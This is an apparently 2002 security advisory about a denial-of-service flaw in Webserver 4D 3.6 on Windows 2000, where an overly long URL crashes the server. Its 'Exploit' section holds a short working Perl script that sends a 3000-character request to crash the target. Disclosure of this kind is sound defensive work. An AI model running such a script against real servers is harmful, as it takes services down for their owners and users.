|
 Webserver
4D 3.6 Denial of Service Vulnerability
Type Denial of Service Release Date August 10, 2002 Product / Vendor Webserver 4D by MDG Computer Services, Inc. is an complete Web Server environment written entirely on top of 4th Dimension, a very powerful relational database for Machintosh and Windows NT. Running on top a database means your server can detect if someone is a new user, how many times a page has been accessed and much more. Web Server 4D currently has three optional modules that are built-in to every copy of Web Server 4D. The three modules are: - WS4D/eCommerce Summary The problem is Webserver 4D 3.6.0 with bounds checking, when you request 3000 characters Ws4d.exe just shuts down. This vulnerability also affects Webserver 4D versions prior to 3.6.0 for Microsoft Windows 2000. If a remote attacker sends a URL request containing an overly long argument to the the attacker can cause the Web server to crash. The Web server must be restarted to regain normal functionality. Exploit An exploit for this vulnerability exists and is available below. ==================== SNIP ==================== #!/usr/bin/perl -w die "Webserver 4D 3.6 DoS by SecurityOffice / Usage: $0 host \n" if $#ARGV <0; print &get($ARGV[0]); exit 0; sub get { $host = $ARGV[0]; $doc = "A" x 3000; system "lynx $host/$doc"; print "Done!\n\n"; } ==================== SNIP ==================== Tested Webserver 4D 3.6 / Windows 2000 sp3 Vulnerable Webserver 4D 3.6 / Windows 2000 sp3 Disclaimer http://www.securityoffice.net is not responsible for the misuse or illegal use of any of the information and/or the software listed on this security advisory. Author Tamer Sahin |
 |